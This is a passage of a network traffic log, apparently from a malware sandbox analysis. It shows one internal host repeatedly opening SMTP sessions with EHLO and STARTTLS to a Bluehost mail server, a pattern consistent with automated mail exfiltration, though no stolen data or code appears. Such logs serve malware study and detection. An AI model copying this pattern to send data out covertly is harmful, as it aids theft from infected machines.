250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:33:06.317152977 CEST | 49739 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:33:06.515319109 CEST | 587 | 49739 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:33:15.554121971 CEST | 587 | 49753 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:33:15 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:33:15.554326057 CEST | 49753 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:33:15.751154900 CEST | 587 | 49753 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:33:15.751425982 CEST | 49753 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:33:15.950134993 CEST | 587 | 49753 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:33:23.243947983 CEST | 587 | 49757 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:33:23 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:33:23.244153023 CEST | 49757 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:33:23.457655907 CEST | 587 | 49757 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:33:23.457859993 CEST | 49757 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:33:23.656215906 CEST | 587 | 49757 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:34:40.195323944 CEST | 587 | 49759 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:40 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:34:40.195552111 CEST | 49759 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:34:40.255414963 CEST | 587 | 49760 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:40 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:34:40.255625010 CEST | 49760 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:34:40.393052101 CEST | 587 | 49759 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:34:40.393222094 CEST | 49759 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:34:40.452086926 CEST | 587 | 49760 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:34:40.452255964 CEST | 49760 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:34:40.591851950 CEST | 587 | 49759 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:34:40.650135040 CEST | 587 | 49760 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:34:46.772742987 CEST | 587 | 49761 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:46 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:34:46.773036957 CEST | 49761 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:34:46.794117928 CEST | 587 | 49762 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:46 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:34:46.794332981 CEST | 49762 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:34:46.969957113 CEST | 587 | 49761 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:34:46.970149040 CEST | 49761 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:34:46.990200996 CEST | 587 | 49762 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:34:46.990319014 CEST | 49762 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:34:47.171823025 CEST | 587 | 49761 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:34:47.189968109 CEST | 587 | 49762 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:34:50.323384047 CEST | 587 | 49763 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:50 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:34:50.323631048 CEST | 49763 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:34:50.520364046 CEST | 587 | 49763 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:34:50.520539045 CEST | 49763 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:34:50.719587088 CEST | 587 | 49763 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:34:51.540391922 CEST | 587 | 49764 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:51 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:34:51.541019917 CEST | 49764 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:34:51.737519026 CEST | 587 | 49764 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:34:51.738224030 CEST | 49764 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:34:51.935959101 CEST | 587 | 49764 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:34:57.977706909 CEST | 587 | 49765 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:57 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:34:57.977869987 CEST | 49765 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:34:58.174664021 CEST | 587 | 49765 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:34:58.174841881 CEST | 49765 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:34:58.372922897 CEST | 587 | 49765 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:35:03.317862034 CEST | 587 | 49766 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:03 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:35:03.324615002 CEST | 49766 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:35:03.521177053 CEST | 587 | 49766 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:35:03.521544933 CEST | 49766 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:35:03.719501972 CEST | 587 | 49766 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:35:06.320000887 CEST | 587 | 49767 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:06 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:35:06.320156097 CEST | 49767 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:35:06.518642902 CEST | 587 | 49767 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:35:06.522763014 CEST | 49767 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:35:06.721072912 CEST | 587 | 49767 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:35:14.867494106 CEST | 587 | 49768 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:14 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:35:14.867705107 CEST | 49768 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:35:15.064642906 CEST | 587 | 49768 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:35:15.068703890 CEST | 49768 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:35:15.266855001 CEST | 587 | 49768 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:35:28.051446915 CEST | 587 | 49769 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:27 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 26, 2024 10:35:28.054642916 CEST | 49769 | 587 | 192.168.2.4 | 50.87.195.61 | EHLO 965543
Apr 26, 2024 10:35:28.252288103 CEST | 587 | 49769 | 50.87.195.61 | 192.168.2.4 | 250-box2344.bluehost.com Hello 965543 [102.129.152.220]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Apr 26, 2024 10:35:28.252629042 CEST | 49769 | 587 | 192.168.2.4 | 50.87.195.61 | STARTTLS
Apr 26, 2024 10:35:28.452194929 CEST | 587 | 49769 | 50.87.195.61 | 192.168.2.4 | 220 TLS go ahead
Apr 26, 2024 10:35:31.606662989 CEST | 587 | 49770 | 50.87.195.61 | 192.168.2.4 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:31 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:31.606829882 CEST49770587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:31.803644896 CEST5874977050.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:31.803786039 CEST49770587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:32.002747059 CEST5874977050.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:35.768610001 CEST5874977150.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:35 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:35.768754959 CEST49771587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:35.964926004 CEST5874977150.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:35.965078115 CEST49771587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:36.163014889 CEST5874977150.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:36.647352934 CEST5874977250.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:36 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:36.647501945 CEST49772587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:36.843811035 CEST5874977250.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:36.847058058 CEST49772587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:37.045042038 CEST5874977250.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:37.754841089 CEST5874977350.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:37 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:37.754966021 CEST49773587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:37.951975107 CEST5874977350.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:37.952109098 CEST49773587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:38.150494099 CEST5874977350.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:39.393001080 CEST5874977450.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:39 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:39.393163919 CEST49774587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:39.589946985 CEST5874977450.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:39.590140104 CEST49774587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:39.820218086 CEST5874977450.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:55.542357922 CEST5874977550.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:55 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:55.543216944 CEST49775587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:55.740255117 CEST5874977550.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:55.740693092 CEST49775587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:55.956368923 CEST5874977550.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:01.454304934 CEST5874977650.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:01 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:01.459032059 CEST49776587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:01.656028986 CEST5874977650.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:01.656389952 CEST49776587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:01.870546103 CEST5874977650.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:10.710277081 CEST5874977750.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:10 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:10.710474968 CEST49777587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:10.906841040 CEST5874977750.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:10.907222033 CEST49777587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:11.106486082 CEST5874977750.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:17.150849104 CEST5874977850.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:17 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:17.151319981 CEST49778587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:17.348068953 CEST5874977850.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:17.348181963 CEST49778587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:17.546612978 CEST5874977850.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:32.112770081 CEST5874977950.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:32 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:32.113012075 CEST49779587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:32.320796967 CEST5874977950.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:32.320986986 CEST49779587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:32.519685984 CEST5874977950.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:36.132191896 CEST5874978050.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:36 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:36.306034088 CEST49780587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:36.504277945 CEST5874978050.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:36.504723072 CEST49780587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:36.702572107 CEST5874978050.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:47.447623968 CEST5874978150.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:47 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:47.447979927 CEST49781587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:47.644378901 CEST5874978150.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:47.644668102 CEST49781587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:47.842349052 CEST5874978150.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:51.603967905 CEST5874978250.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:51 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:51.604675055 CEST49782587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:51.712610006 CEST5874978350.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:51 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:51.714802980 CEST49783587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:51.800863981 CEST5874978250.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:51.802799940 CEST49782587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:51.911451101 CEST5874978350.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:51.911760092 CEST49783587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:52.000360966 CEST5874978250.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:52.109939098 CEST5874978350.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:52.896142006 CEST5874978350.87.195.61192.168.2.4421 box2344.bluehost.com lost input connection
                                                      Apr 26, 2024 10:36:53.210360050 CEST5874978450.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:53 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:53.210480928 CEST49784587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:53.410368919 CEST5874978450.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:53.412219048 CEST5874978450.87.195.61192.168.2.4421 box2344.bluehost.com lost input connection
                                                      Apr 26, 2024 10:36:53.708465099 CEST5874978550.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:53 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:53.708642006 CEST49785587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:53.904931068 CEST5874978550.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:53.905142069 CEST49785587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:54.102890968 CEST5874978550.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:37:05.498631001 CEST5874978650.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:37:05 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:37:05.498776913 CEST49786587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:37:05.695743084 CEST5874978650.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:37:05.695940971 CEST49786587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:37:05.783169985 CEST5874978750.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:37:05 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:37:05.783319950 CEST49787587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:37:05.833647013 CEST5874978850.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:37:05 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:37:05.833780050 CEST49788587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:37:05.894460917 CEST5874978650.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:37:05.979835987 CEST5874978750.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
